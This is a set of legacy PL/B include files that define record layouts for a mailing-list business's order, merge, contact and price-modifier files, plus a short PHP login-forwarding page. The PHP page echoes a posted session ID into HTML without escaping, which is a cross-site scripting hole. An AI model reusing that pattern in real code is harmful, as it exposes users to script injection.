NCKIDATE DIM 8 028-035 DATE ENTERED
.NCKIAP1 DIM 7 037-042 A/P1
.NCKIAP2 DIM 7 043-049 A/P2
NCKIAP1 form 10.2 037-048 A/P1
NCKIAP2 form 10.2 048-061 A/P2
NCKIAP3 form 10.2 062-074 A/P2
.end patch 1.1
LISTEND
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/LOGDATA.INC
* .............................................................................
. THE LOG ENTRYS TYPE:
. LOG-ON .........USER SIGN ON
. LOG-OFF.........USER SIGN OFF
. BAD ID..........INVALID ATTEMPT TO SIGN ON
. ERROR...........DATASHARE ERROR
. PROGRAM.........SUCCESSFUL CHAIN TO PROGRAM
. NO PROGRAM .....UNSUCCESSFUL CHAIN TO PROGRAM
* .............................................................................
.logfile.dat
LOGFILE FILE Fixed=140
LOGTYPE DIM 10
LOGINFO DIM 20
LogFlag form 1
* .............................................................................
.SEQ FORM "-1" USE VARS FROM CONS.INC
.SEQ3 FORM "-3"
LOGPORT DIM 24 1-24
LOGRN FORM 4 25-28
ZERO FORM "0" 29-29
SUBDIRCT DIM 6 30-35
LOCKSW DIM 1 36-36
PROC DIM 2 37-38
PORT DIM 2 39-40
PORTTYPE DIM 2 41-42
PORTSCRN DIM 2 43-44
PORTUDA DIM 5 45-49
FILL DIM 1 50-50 *USED FOR UNPACK OF PORT.
PORTINFO DIM 40 51-90 *USED FOR CLOCK OF PORT.
TASK DIM 12 91-102 *USED FOR UNPACK OF PORTINFO, = TASK NAME
NODE DIM 12 103-114 * " " " " " , = NODE NAME
; IFZ PC
ATTRIB DIM 16 115-130 * " " " " " , = ATTRIBUTES OF PORT.
;user dim 10 131-140
; XIF
; IFNZ PC
;ATTRIB DIM 11 * " " " " " , = ATTRIBUTES OF PORT.
; XIF
HEADER INIT "* NODE TASKNAME LOG TYPE DATE "
HEADER1 INIT " TIME OTHER INFO"
HEADER2 INIT "* ==== ======== ======== ==== "
HEADER3 INIT " ==== =========="
* END OF INCLUDE.
. ................
<file_sep>/DEVELOP/Includes - why/nord2dd.inc
..............................................................................
.
. NORD2DD INCLUSION
. NIN ORDER FILE DEFINITION (CREATED FROM THE ORDERPIC PROGRAM)
.
. FILE NAME : ? (SUPPLIED BY USER)
. REC LENGTH: 498 VAR
. WAS REC LENGTH: 384 VAR PATCH #6
. WAS REC LENGTH: 344 VAR
. WAS REC LENGTH: 319 VAR
. patch 22 order file conversion mailer et al
. Patch 9.1 DLH 09Jan2007 add OCompID
. Patch 9 DLH 12September2006 add OFulFIll 6 byte Fulfillment company#
. PATCH 8 ASH 19MAR01 NINORD ADDED TO FILE MANAGER
. PATCH 7 ASH 04May99 Added var for Exchange Price
. PATCH 6 ASH 08JAN99 NINORD Y2K, File expansion
. patch 5 DLH 28Sep98 add new ostat & cancodes for Pending orders
..13Aug98 ASH increased record size to account for increase in var size w/ Broker Y2K
..17oct94 DLh proposed change adding net info expand record to 344.
..............................................................................
.
NORDFILE FILE VAR=498,COMP
.START PATCH 8 REPLACED LOGIC
.NORDNAME INIT " "
NORDNAME INIT " "
.END PATCH 8 REPLACED LOGIC
NORDFLAG FORM 1
.
ORD2VARS List
ORCODE DIM 1 001-001 ORDER CODE, "S"
OSTAT DIM 1 002-002 STATUS, 0,B,Q,X,p,x,l,z
. 0-Live order
. B-Billed order
. Q-Cancelled/Billed order
. X-Cancelled order
. e-Live Order with Estimated Invoice uses "X" if cancelled
.patch 5 New values for OSTAT p Lower case = Pending order (awaiting LO/manager Approval)
. x Lower case = Cancellation of above (never approved)
. l Lower case = LCR
. z Lower case = Cancellation of LCR
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
.begin patch 22
Ofill1 Dim 2 003-004 for company # (mailer conversion DOne) ** New
.end patch 22
OMLRNUM DIM 4 005-008 MAILER NUMBER, AIM KEY 1
..................................................
OLRN DIM 6 009-014 LR NUMBER, KEY
OCOBN DIM 3 015-017 CONTACT # (NIN) OR BROKER # (CMP)
OLNUM DIM 6 018-023 LIST NUMBER, AIM KEY 2
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
.begin patch 22
Ofill2 Dim 2 024-025 for company # (Owner conversion DOne) ** New
OLON DIM 4 026-029 LIST OWNER NUMBER
OwnCtn Dim 3 030-032 Owner COntact ** New
.end patch 22
..................................................
OMLRPON DIM 12 033-044 MAILER PURCHASE ORDER NUMBER was 7
OQTY DIM 9 045-053 QUANTITY, X,XXX,XXX
OPPM DIM 5 054-058 PRICE PER THOUSAND, XXX.XX
OMLRKY DIM 12 059-070 MAILER'S KEY
OFOCODE DIM 2 071-072 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
ORTNDTEC DIM 2 073-074 RETURN DATE (CENTURY)
ORTNDTEY DIM 2 075-076 RETURN DATE (YEAR)
ORTNDTEM DIM 2 077-078 RETURN DATE (MONTH)
ORTNDTED DIM 2 079-080 RETURN DATE (DAY)
OMDTEC DIM 2 081-082 MAIL DATE (CENTURY)
OMDTEY DIM 2 083-084 MAIL DATE (YEAR)
OMDTEM DIM 2 085-086 MAIL DATE (MONTH)
OMDTED DIM 2 087-088 MAIL DATE (DAY)
OTOCODE DIM 1 089-089 TEST ORDER CODE, "1"
OSOTCODE DIM 1 090-090 SELECTION ON TEST CODE, 1,2 OR 3
OCCODE DIM 1 091-091 CONTINUATION CODE, "1"
OLRNCO DIM 6 092-097 LR NUMBER OF CONTINUATION CODE
OODTECOC DIM 2 098-099 ORDER DATE OF CONTINUATION CODE (CENTURY)
OODTECOY DIM 2 100-101 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOM DIM 2 102-103 ORDER DATE OF CONTINUATION CODE (MONTH)
OODTECOD DIM 2 104-105 ORDER DATE OF CONTINUATION CODE (DAY)
OQTYCO DIM 9 106-114 QUANTITY OF CONTINUATION ORDER, XXX,XXX,XXX
OSPI DIM 24 115-138 SPECIAL INSTRUCTION CODES, MAX.6 (2 DIGIT)
OBildrct DIM 1 139-139 Placed as bill direct? y=yes n=no ' '=no
OBRKGUAR DIM 1 140-140 BROKER GUARANTY, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
OELCODE DIM 1 141-141 ENTIRE LIST CODE
. 1=RENT/ENTIRE,2=EXCH,3=EXCHANGE/ENTIRE
OODNUM DIM 7 142-148 OFFER DeSCRIPTION NUMBER
OODES DIM 5 149-153 OFFER DESCRIPTION
ONETQTY DIM 9 154-162 ORDER NET QUANTITY
OCAMP DIM 6 163-168 ASSOCIATED CAMPAIGN
OCLRSTAT DIM 1 169-169 CLEARANCE STATUS 1=EXCHANGE, 2=RENT, 3=EXC/SPLIT, 4=DENIED
OCLRINIT DIM 3 170-172 INITS OF PERSON WHO CLEARED LCR
OBRKRPT DIM 1 173-173 OUTSIDE BROKER NOTIFIED OF CLEARANCE STATUS? 1=YES, B1=NO
OCLRDTEC DIM 2 174-175 CLEAR DATE (CENTURY)
OCLRDTEY DIM 2 176-177 CLEAR DATE (YEAR)
OCLRDTEM DIM 2 178-179 CLEAR DATE (MONTH)
OCLRDTED DIM 2 180-181 CLEAR DATE (DAY)
ORENT DIM 1 182-182 LCR REQUEST FOR RENT "1" = YES
OHIST DIM 1 183-183 ORDER HISTORY "l"-LCR to Live, "L"-In-House LCR to Live, "p"-Pending to Live
. IN-HOUSE LCR's: "e"-Waiting for Clearance
. "E"-Cleared
. "*"-Faxed to Owner
. "z"-Denied
OXPPM DIM 5 184-188 EXCHANGE PRICE PER THOUSAND, XXX.XX
.begin patch 22
oFILL3 dIM 2 189-190 FOR CONVERSION OF COMP-RETURN-TO ** New
.enD patch 22
ORTNNUM DIM 4 191-194 RETURN-TO NUMBER
..................................................
OTAPERET DIM 1 195-195 TAPE-RETURNABLE ?
OUQTY DIM 9 196-204 UNIVERSE QUANTITY, XXX,XXX,XXX
OSALES10 DIM 1 205-205 TENS DIGIT OF SALESMAN #.
OSALES DIM 1 206-206 ONES DIGIT OF SALESMAN CODE
OCOCODE DIM 2 207-208 CONTACT CODE, 1,2,3, OR 4
OCO2CODE DIM 2 209-210 CONTACT CODE, 1,2,3, OR 4
OODTEC DIM 2 211-212 ORDER DATE (CENTURY)
OODTEY DIM 2 213-214 ORDER DATE (YEAR)
OODTEM DIM 2 215-216 ORDER DATE (MONTH)
OODTED DIM 2 217-218 ORDER DATE (DAY)
OSCODE DIM 1 219-219 SAMPLE CODE, 1=sample enclosed,2=sample to follow, OR 3=sample prev approved
OCOMSLCT DIM 1 220-220 overlay: COMSELECT='C', lifestyle="L"
. (LSVCS)
OSHP DIM 2 221-222 SHIPPED VIA CODE, 0,1,2...9.
O1DES DIM 35 223-257 LINE #1 OF LIST DESCRIPTION, DATACARD
O2DES DIM 35 258-292 LINE #2 OF LIST DESCRIPTION, KEYIN
OREUSE DIM 6 293-298 RE-USE LR #, RTN-TO # WILL BE '0'
ODOWJ DIM 3 299-301 TYPISTS INITIALS was 2
OEXQTY DIM 9 302-310 EXCHANGE QTY ON SPLIT ORDER.
GUARCODE DIM 1 311-311 NIN GUARANTY CODE, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
. '5' =NOT USED, '6'=REC'D PREPAY,
. '7' REC'D PRE 30-DAY, '8' REC'D PRE 60,
. '9' =REC'D PRE 60 DAY.
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
.begin patch 22
oFILL4 dIM 2 312-313 .FOR CONVERSION OF BRK/CONSULT
.enD patch 22
OBRKNUM DIM 4 314-317 BROKER/CONSULTANT NUMBER.
OBRKCNT DIM 3 318-320 BROKER/CONSULTANT CONTACT NUMBER.
..................................................
osamcde dim 3 321-323 sample numbers
onetper dim 2 324-325 net name percentage (NN = Net Name)
onetrc form 3.2 326-331 net name running charge
onetfm dim 1 332-332 net flag (F)lat'volume', per (M)'net', (N)o
. deducts allowed by Lo.
.
onetmin form 7 333-339 net name minimum.
OFullFil Dim 6 340-345 Fullfilment number
OCompID Dim 1 346-346 Brokerage Company ID 'N' or ' '= NIN 'P' = Pacific lists
OCompID2 Dim 1 347-347 Management Company ID 'N' or ' '= NIN 'P' = Pacific lists
.begin patch 22
.ofiller dim 72 337-408
ofiller dim 61 348-408
ORDmNAME DIM 45 409-453 Broker NAME (ELSE blank)
ORDcNAME DIM 45 454-498 MAILER NAME (ALWAYS)
* .......................................................................
Listend
<file_sep>/include/nmrgdd.inc
* *****************************************************************************
* NAMES IN THE NEWS MASTER MERGE FILE.
* *****************************************************************************
.
. FILE: NINMERGE
. LENGTH: 465
.COMPRESS: YES
. TYPE: ISAM
. KEY: NMRGFLD
. JD 17Sep2007 added new var nmrgcnr
. DLH 8Feb2007 FIle manager
. JD 05DOct5 Disaster deduct created.
. JD 09Dec04 DPV no longer valid deduct.
. JD 24JUn04 record expanded.
. JD 24aug95 added new variable.
. DLH 6JAN93 CREATED
...............................................................................
.19April 08 DH remove compression add no dupe
.MinXFILE IFILE KeyLen=6,FIXED=20,Name="Min2NIN.ISI|NINS1:502"
.NMRGFILE IFILE KEYLEN=6,COMP,VAR=401
.NMRGFILE IFILE KEYLEN=6,COMP,VAR=465,Name="NINMERGE.ISI|NINS1:502"
NMRGFILE IFILE KEYLEN=6,NODUPE,VAR=465,Name="NINMERGE.ISI|NINS1:502"
NMRGFLE1 IFILE KEYLEN=6,Name="NINMRGE.ISI|NINS1:502"
.........NOTE .DAILY PRINT FILE LEN 9
.NMRGFILE IFILE KEYLEN=6,COMP,VAR=465
.NMRGFLE1 IFILE KEYLEN=6 .DAILY PRINT FILE LEN 9
NMRGNAME INIT "NINMERGE.ISI|NINS1:502"
NMRGNME1 INIT "NINMRGE.ISI|NINS1:502"
NMRGFLD DIM 6
NMRGFLAG FORM 1
NMRGPATH FORM 1
*
NMRGVAR LIST
.
. BEGINNING OF VARIABLE LIST.
.
NMRGLR DIM 6 001-006 LR NUMBER. **KEY**
NMRGFILL DIM 4 007-010 FILL.
NMRGLNAM DIM 49 011-059 LIST NAME.
NMRGKCOD DIM 10 060-069 KEY CODE.
NMRGRQTY FORM 8 070-077 QTY REC'D
NMRGIQTY FORM 8 078-085 QTY INPUT
NMRGTREJ FORM 8 086-093 TOTAL REJECTS
NMRGID FORM 8 094-101 INTRA DUPES.
NMRGNETI FORM 8 102-109 NET INPUT.
NMRGELIM FORM 8 110-117 ELIMINATOR HITS
NMRGHDRP FORM 8 118-125 HOUSE DROPS *NEW
NMRGCS FORM 8 126-133 CUSTOMER SUPPRESS *THEse 2 fields were
NMRGUDUP FORM 8 134-141 UNUSED DUPLICATES *swapped, early 94?.
NMRGND FORM 8 142-149 NON DUPLICATES
NMRGDUPM FORM 8 150-157 DUPLICATES (MULTIES)
NMRGNET FORM 8 158-165 NET OUTPUT
NMRGZIPV FORM 8 166-173 ZIPS VERIFIED
NMRGZIPC FORM 8 174-181 ZIPS CORRECTED
NMRGZIP4 FORM 8 182-189 ZIP+4 CRRT CODED
NCOAMWF FORM 8 190-197 NCOA MTCH W/FWD
NCOAMNF FORM 8 198-205 NCOA MTCH NO/FWD
NCOATOTM FORM 8 206-213 TOT NCOA MTCH
NIXIEM FORM 8 214-221 NIXIE OPT MTCH
NCOAUNM FORM 8 222-229 NCOA UNMTCHED
NCOANFRJ FORM 8 230-237 NCOA NO/FWD REJECTS *NEW
NCOANIX1 FORM 8 238-245 NCOA NIXIE 1 REJECTS *NEW
NCOANIX2 FORM 8 246-253 NCOA NIXIE 2 REJECTS *NEW
NCOANIX3 FORM 8 254-261 NCOA NIXIE 3 REJECTS *NEW
NMRGERR FORM 8 262-269 ERROR REJECTS.
NMRGDISF FORM 8 270-277 DEAD REJECTS.
NMRGNPER FORM 8 278-285 NONPERSONAL REJECTS
NMRGDMA FORM 8 286-293 DMA REJECTS
NMRGELMX FORM 8 294-301 ELIMINIX REJECTS
NMRGZ4 FORM 8 302-309 ZIP+4 CRRT REJECTS
NMRGNIX FORM 8 310-317 NIXIE REJECTS
NMRGTDMC FORM 8 318-325 TDMC REJECTS.
.NMRGEXIT FORM 8 326-333 EXIT REJECTS *no longer used
NCOAREJ FORM 8 326-333 NCOA REJECTS *new field NIXIE OPT.
NMRGCUST FORM 8 334-341 CUSTOMER REJECTS
NMRGPRIS FORM 8 342-349 PRISON REJECTS
NMRGDROP FORM 8 350-357 MAILDROP REJECTS
NMRGHH FORM 8 358-365 DROPED BY HOUSE HITS *NEW
NMRGFAM FORM 8 366-373 FAMILY DUPE DROPS *NEW
nmrgconv form 8 374-381 Epsilon conversion drops - includes
. military, bad address,
NMRGFIL1 DIM 4 382-385 NOT USED.
nmrgrep form 8 386-393 republican hits (DNC)
nmrgnnet form 8 394-401 new netout after repub hits
nmrgdpv form 8 402-409 DPV drops
nmrgdisa form 8 410-417 Disaster drops
nmrgcnr form 8 418-425 CNRS
nmrgfil2 dim 40 426-465 not used.
.nmrgfil2 dim 48 418-465 not used.
.
.END OF LIST
.
LISTEND
.
<file_sep>/DEVELOP/Includes - why/ncntdd.inc
......................................
.NCNTDD INCLUSION
.NIN Contact/Caller File Definition
.
.2013 August beef up sales portion change ncnt0001 to only use active records for dupe port check
.19 June 2012 add ninuser file data. will ultimately get rid of ninuser
.20May 2009 DLH add two bytes to hold Salesperson # to ultimately get rid of oslspern
.FILE NAME: NINCNT.DAT
.REC LENGTH: 135 FIXED
.INDEX KEY: (1) 001-002 (CNTNUM)
. (2) 063-065 (CNTPORT)
.
.AAMDEX KEY: (1) 003-037 (CNTNAME)
.
.NCNTNAME INIT "NINCNT"
.NCNTNME1 INIT "NINCNT"
.NCNTNME2 INIT "NINCNT2"
NCNTNAME INIT "NINCNT.aam|NINS1:502 "
NCNTNME1 INIT "NINCNT.isi|NINS1:502 "
NCNTNME2 INIT "NINCNT2.isi|NINS1:502"
NCNTNME3 INIT "NINCNT3.isi|NINS1:502"
NCNTNME4 INIT "NINCNT4.isi|NINS1:502"
NCNTFLIST FILELIST
NCNTFILE IFILE KEYLEN=2,FIXED=135,Name="NINCNT.isi|NINS1:502 "
NCNTFIL1 IFILE KEYLEN=3,FIXED=135,Name="NINCNT2.isi|NINS1:502"
NCNTFIL2 AFILE FIXED=135,Name="NINCNT.aam|NINS1:502 "
NCNTFIL3 IFILE KEYLEN=3,FIXED=135,Name="NINCNT3.isi|NINS1:502"
.Sales only programmer needs to check active status
NCNTFIL4 IFILE keylen=2,FIXED=135,Name="NINCNT4.isi|NINS1:502"
FILELISTEND
NCNTFLD DIM 2 CNTNUM (Primary Index)
NCNTFLD1 DIM 3 CNTPORT (Secondary Index)
NCNTFLD2 DIM 38 CNTNAME (Primary Aamdex)
NCNTFLD3 DIM 3 CNTINITS(Secondary Index)
NCNTFLD4 DIM 2 CNTSALES(Secondary Index)
NCNTFLAG FORM 1
NCNTFLG1 FORM 1
NCNTFLG2 FORM 1
NCNTPATH FORM 1 .1=cntnum,2=aim(left over),3=cntport,4=salesnumber
NCNTLOCK FORM 1
.
.
CNTVARS LIST
CNTNUM DIM 2 001-002 Contact # - KEY - duplicates allowed but only one should be active, zero filled
CNTNAME DIM 35 003-037 Contact Name
CNTPHONE DIM 25 038-062 Contact Phone # - Allows standard
. 14 digit #: "(XXX) XXX-XXXX" with possible extension #
CNTPORT DIM 3 063-065 Port # for Contact
CNTTEAM DIM 2 066-067 Team # for Contact
CNTRIGHTS DIM 1 068-068 Contact Rights: "1" - Access to ALL Contacts
. CNTRIGHTS2 not needed
. Modification of all Contacts, including Captains
. "2" - Captain - Access to all Team members
. CNTRIGHTS2 needed to access other Teams
. Modification only other Team Members
. "3" - Team - Access to all Team members
. CNTRIGHTS2 needed to access other Teams
. No modification allowed
. "4" - Individual - No outside access
. CNTRIGHTS2 needed to access other Contacts
. No modification allowed
CNTRIGHTS2 DIM 40 069-108 Accessible Outside Contacts
. Maximum of 20 extra Contacts (20 * 2byte CNTNUM = 40)
CNTPRINT FORM 1 109-109 Printer Default
CNTCNT FORM 1 110-110 "1" = Contact a valid Caller/Contact/Planner
.if cntcnt is not "1" this record will not display in the contact comboboxes in the order program(s)
CNTComp DIM 1 111-111 "1"=NIN, "2"=PLI Filler
.CNTFILLER DIM 25 111-135 Filler
.CNTFILLER DIM 24 112-135 Filler
CntSales Dim 2 112-113 two byte salesperson # from Oslspern.inc, zero filled
CntInactive Dim 1 114-114 ."Y" = Inactive Sales person
CntInactiv1 Dim 1 115-115 ."Y" = Inactive Contact
CNTINITS Dim 3 116-118
CNTFILLER DIM 17 119-135 Filler
LISTEND
.. .............................................................................
..CONTACT1/INC
.. .CONTACT TABLE USED FOR DISPLAY AND PRINT PROGRAMS
..
.OCNT DIM 40
.OCNT0 INIT "Billing(415) 291-5621"
.OCNT1 INIT "<NAME>(415) 291-5637"
.OCNT2 INIT "<NAME>(415) 291-5665"
..OCNT2 INIT "jennifer ost" left 9/92
..OCNT2 INIT "glendi henion"
..OCNT3 INIT "laura trupin"
.OCNT3 INIT "<NAME>(415) 291-5656"
..OCNT4 INIT "tina maultsby"
..OCNT4 INIT "catherine veyna"
..OCNT4 INIT "melinda rivera" 1/8/92
..OCNT4 INIT "stacey white" 3/2/93
.OCNT4 INIT "<NAME>(415) 291-5644"
..OCNT4 INIT "leola wong" 5/93
.OCNT5 INIT "<NAME>(415) 291-5669"
..OCNT5 INIT "<NAME>(415) 291-5669"
..OCNT5 INIT "jennifer post"
..OCNT5 INIT "marguerite salmon"
..OCNT5 INIT "<NAME>"
..OCNT5 INIT "derek glass"
..OCNT6 INIT "<NAME>"
..OCNT6 INIT "<NAME>"
.OCNT6 INIT "<NAME>(415) 291-5668"
..OCNT6 INIT "<NAME>(415) 291-5668" 11/10/97
..OCNT7 INIT "linda mietus"
..OCNT7 INIT "<NAME>(415) 291-5667" 12/98
..OCNT7 INIT "L<NAME>(415) 291-5667" 01/10/2000
.OCNT7 INIT "<NAME> (415) 291-5621"
..OCNT8 INIT "<NAME>"
..OCNT8 INIT "<NAME>"
..OCNT8 INIT "liora natelson"
..OCNT8 INIT "<NAME>(415) 291-5655" 4/1/98
..OCNT8 INIT "<NAME>(415) 291-5609"
.OCNT8 INIT "<NAME>(415) 291-5609"
..OCNT9 INIT "elizabeth corsale"
.OCNT9 INIT "Phoebe Fearing(415) 291-5667"
..OCNT9 INIT "<NAME>(415) 291-5638" 5/1/98
.OCNT10 INIT "<NAME>(415) 291-5640"
..OCNT11 INIT "<NAME>"
..OCNT11 INIT "<NAME>"
..OCNT11 INIT "<NAME>" .4/28/94
..OCNT11 INIT "<NAME>" .7/19/94
..OCNT11 INIT "<NAME>(415) 291-5640"
..OCNT11 INIT "<NAME>(415) 291-5603"
.OCNT11 INIT "<NAME>(415) 291-5647"
..OCNT12 INIT "marg<NAME>" cold calls
.OCNT12 INIT "<NAME>(415) 291-5643"
..OCNT13 INIT "yol<NAME>"
..OCNT13 INIT "<NAME>"
..OCNT13 INIT "<NAME>" left sales 7/93.
..OCNT13 INIT "kathleen pavao"
..OCNT13 INIT "<NAME>(415) 291-5657" 5/31/98
.OCNT13 INIT "Be<NAME>avez(415) 291-5657" 08/04/98
..OCNT14 INIT "<NAME>"
.OCNT14 INIT "<NAME>(415) 291-5642"
..OCNT15 INIT "kim kouri"
.OCNT15 INIT "<NAME>(415) 291-5663"
..OCNT15 INIT "<NAME>"
.OCNT16 INIT "<NAME>(415) 291-5662"
.OCNT17 INIT "<NAME>(415) 291-5658"
.Modified Contact: 08 <NAME> to <NAME> 07/31/2000 by <NAME>
.Modified Contact: 23 <NAME> to <NAME> 07/31/2000 by <NAME>
.Modified Contact: 34 Meg Plaza to Nancy La Shell 08/25/2000 by <NAME>oto
.Modified Contact: 21 <NAME> to Spare 10/09/2000 by <NAME>
.Modified Contact: 17 <NAME> to <NAME> 10/09/2000 by <NAME>
.Modified Contact: 28 <NAME> to <NAME> 10/09/2000 by <NAME>
.Modified Contact: 05 <NAME> to Spare 10/11/2000 by <NAME>
.Modified Contact: 07 <NAME> to <NAME> 10/11/2000 by <NAME>
.Modified Contact: 05 Spare to Tami Frost 10/26/2000 by <NAME>
.Modified Contact: 02 <NAME> to <NAME> 10/31/2000 by <NAME>
.Modified Contact: 16 <NAME> to <NAME> 10/31/2000 by <NAME>
.Modified Contact: 21 Spare to <NAME> 11/13/2000 by <NAME>
.Modified Contact: 15 <NAME> to <NAME> 11/15/2000 by <NAME>
.Modified Contact: 22 <NAME> to <NAME> 03/09/2001 by <NAME>
.Modified Contact: 29 <NAME> to <NAME> 09/04/2001 by <NAME>
.Modified Contact: 06 <NAME> to <NAME> 10/01/2001 by <NAME>
.Modified Contact: 17 <NAME> to <NAME> 10/02/2001 by <NAME>
.Modified Contact: 03 <NAME> to Not Currently Used 04/08/2002 by <NAME>
.Modified Contact: 41 <NAME> to Not Currently Used #2 04/08/2002 by <NAME>
.Modified Contact: 34 Nancy La Shell to Nancy LaShell 04/26/2002 by <NAME>
.Modified Contact: 39 <NAME> to <NAME> 04/29/2002 by <NAME>
.Modified Contact: 31 <NAME> to <NAME> 08/09/2002 by <NAME>
.Modified Contact: 07 <NAME> to Ann Lovi 09/03/2002 by <NAME>
.Modified Contact: 17 <NAME> to Janice Rounds 02/11/2003 by Diego Montoya
.Modified Contact: 17 <NAME> to <NAME> 05/23/2003 by Diego Montoya
.Modified Contact: 30 <NAME> to Sandra Inouye 06/11/2003 by Mr Batch
.Modified Contact: 30 <NAME> to Sandra Inouye 06/11/2003 by Mr Batch
.Modified Contact: 48 List Management to List Management Clearances 08/11/2003 by <NAME>
.Modified Contact: 17 <NAME> to <NAME> 08/22/2003 by Diego Montoya
.Modified Contact: 13 <NAME> to <NAME> - Sales 10/22/2003 by Diego Montoya
.Modified Contact: 50 <NAME> to available 10/23/2003 by <NAME>
.Modified Contact: 13 <NAME> - Sales to Becky Chavez 10/23/2003 by <NAME>
.Modified Contact: 50 available to Sue Adams 11/06/2003 by Diego Montoya
.Modified Contact: 36 <NAME> to <NAME> 04/16/2004 by <NAME>
.Modified Contact: 55 <NAME> to <NAME> 01/14/2005 by Diego Montoya
.Modified Contact: 55 <NAME> to <NAME> 01/26/2005 by Diego Montoya
.Modified Contact: 58 <NAME> to <NAME> 03/14/2005 by Diego Montoya
.Modified Contact: 62 <NAME> to <NAME> 10/31/2005 by <NAME>
.Modified Contact: 62 <NAME> to <NAME> 11/21/2005 by Diego Montoya
.Modified Contact: 65 <NAME>-Hassan to Ruka ALHassan 03/16/2006 by Diego Montoya
.Modified Contact: 82 <NAME> to <NAME> 05/30/2007 by <NAME>
.Modified Contact: 82 <NAME> to <NAME> 06/05/2007 by <NAME>
.Modified Contact: 48 List Management Clearances to List Management Clearances NIN 10/11/2007 by <NAME>
.Modified Contact: 72 <NAME> to <NAME> 01/07/2008 by <NAME>
.Modified Contact: 73 <NAME> to <NAME> 01/07/2008 by <NAME>
.Modified Contact: 03 Not Currently Used to Front Desk 03/11/2011 by <NAME>
.Modified Contact: 23 <NAME> to <NAME> 04/17/2012 by <NAME>
.Modified Contact: 41 Not Currently Used #2 to <NAME> 04/17/2012 by <NAME>
.Modified Contact: 43 Telecomm to Pia Payne 06/30/2012 by <NAME>
.Modified Contact: 01 Billing to Cold Calls LM 08/16/2013 by <NAME>
<file_sep>/DEVELOP/Includes - why/nmodBdd.inc
******************************************************
* NModBDD INCLUSION
* PRICE MODIFIER FILE FOR DATACARD SUBSIDIARY FILES
* PRICE MODIFIER FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER PRICE MODIFIER FILE.
* ****************************************************
.
. FILE: NINModB
. LENGTH: 60
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-3 NModBNUM
.AIMDEX KEY: 4-23 NModBDESC
......................................................
NModBNAME INIT "NINModB"
NModBFLIST FILELIST
NModBFILE IFILE KEYLEN=9,FIXED=60,Name="NINModB.isi|NINS1:502"
NModBFLE2 AFILE FIXED=60,Name="NINModB.aam|NINS1:502"
FILELISTEND
.
NModBLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NModBFLD DIM 3
NModBFLD1 DIM 23
NModBFLAG FORM 1
NModBPATH FORM 1
.
NModBVARS LIST
NModBNUM DIM 3 1-3 PRICE MODIFIER NUMBER
NModBDESC DIM 20 4-23 PRICE MODIFIER DESCRIPTION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
NModBCALC DIM 20 24-43 PRICE MODIFIER CALCULATION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /1000
. "002"
. "003" *1
. "004"
. "005"
. "006" *0
. "007"
. "008"
. "009"
NModBStamp Dim 17 44-60
LISTEND
<file_sep>/DEVELOP/robb htt/foward.php
<html>
<?php
// print ("\$_POST[cgiusername] on an external page called with include is: " . $_POST[cgiusername]);
print ("\n\$_POST[SID] on an external page called with include is: " . $_POST[SID]);
// print ("\n\$_POST[cgipassword] on an external page called with include is: " . $_POST[cgipassword]);
?>
<form name='LoginForm' method='post' action='/plb-bin/login.plc'>
<input type='hidden' name='SID' value='<?php print $_POST[SID]; ?>' />
</form>
<script language=javascript>
</script>
</html>
<file_sep>/DEVELOP/Includes - why/NMDCMSCDD.INC
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: NMDC_MSC
. LENGTH: Fixed
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
NMSCNAME Init "NMDC_MSC.Isi|NINS1:502"
NMSCFILE IFILE Name="NMDC_MSC.Isi|NINS1:502"
NMSCSFILE FILE
NMscFld Dim 6
NMSCFLAG FORM 1
NMSCPATH FORM 1
.
NMSCVARS LIST .for ease I am using Min's names
NDDCNO Dim 6 1-6 NIN Card#
NDAD1 Dim 30 7-36 Addressing 1
NDAD2 Dim 30 37-66 Addressing 2
NDMO1 Dim 25 67-91 Min order line 1
NDMO2 Dim 25 92-116 Min order line 2
NDUS1 Dim 25 117-141 UNit of Sale line 1
NDUS2 Dim 25 142-166 UNit of Sale line 2
NDSX1 Dim 25 167-191 Gender Line 1
NDSX2 Dim 25 192-216 Gender Line 2
NDMD1 Dim 25 217-241 Media Line 1
NDMD2 Dim 25 242-266 Media Line 2
NDRS1 Dim 25 267-291 Net Name Line 1
NDRS2 Dim 25 292-316 Net Name Line 2
NDDLT Dim 1 317-317 'A'ctive/'I'nactive
ListEnd
<file_sep>/include/Mindd.inc
******************************************************
* MIN List FILE datacard x ref DESCRIPTORS.
. ....................................................
* ****************************************************
* MIN DATACARD FILES.
* ****************************************************
.
. FILE: Min2NIN
. LENGTH: 20
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
;Secondary FIles See
......................................................
MinXNAME DIM 8
MinXFILE IFILE KeyLen=6,FIXED=20,Name="Min2NIN.ISI|NINS1:502"
MinXFILE2 IFILE KEYlen=6,FIXED=20,Name="Min2NIN2.ISI|NINS1:502"
MinXFLd Dim 6 .NIN list number 1
MinXFLD Dim 6 .min List number
MinXFLAG FORM 1
MinXPATH FORM 1
.
MinVARS LIST
MInxNIN DIM 6 1-6 datacard number
